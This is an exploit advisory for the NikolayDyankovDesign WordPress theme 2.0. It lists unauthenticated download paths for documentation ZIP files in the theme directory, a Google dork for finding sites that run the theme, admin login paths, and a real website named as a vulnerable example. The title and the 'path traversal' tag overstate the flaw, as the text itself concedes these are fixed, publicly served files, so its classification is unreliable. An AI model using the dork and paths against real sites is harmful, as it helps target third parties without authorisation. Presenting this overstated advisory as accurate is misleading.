WordPress NikolayDyankovDesign 2.0 Arbitrary File Disclosure

WordPress NikolayDyankovDesign theme version 2.0 suffers from an arbitrary file disclosure vulnerability: the theme ships its product documentation as ZIP archives inside a web-readable documentations/ directory, so anyone who knows the path can download them from the live site without authentication.


MD5 | 7319655844999b939030dbbc03848d4e

#################################################################################################

# Exploit Title : WordPress NikolayDyankovDesign Themes 2.0 Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : pinterest.com/nikolaydyankov/ ~ nikolaydyankovdesign.com ~ semsoft.ca
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0 and 2.0
# Exploit Risk : Medium
# Google Dorks : inurl:"/wp-content/themes/nikolaydyankovdesign/"
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
# CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

#################################################################################################

# Admin Panel Login Path :

/demox/admin/
/wp-log

# Exploit :

The following documentation archives are served directly out of the theme directory. A plain unauthenticated GET for any of them returns the ZIP. The paths are fixed and no request parameter is involved, so in practice this is direct download of files the theme ships rather than a traversal through user input.

/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip

/wp-content/themes/nikolaydyankovdesign/documentations/flipper-for-wordpress-2-0.zip

/wp-content/themes/nikolaydyankovdesign/documentations/flipper.zip

/wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map-for-wordpress.zip

/wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map.zip

/wp-content/themes/nikolaydyankovdesign/documentations/timeliner-for-wordpress.zip

/wp-content/themes/nikolaydyankovdesign/documentations/timelinexml.zip

/wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline-for-wordpress.zip

/wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline.zip

#################################################################################################

# Example Vulnerable Site =>

[+]
photobook.com.tr/demox/siparis/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
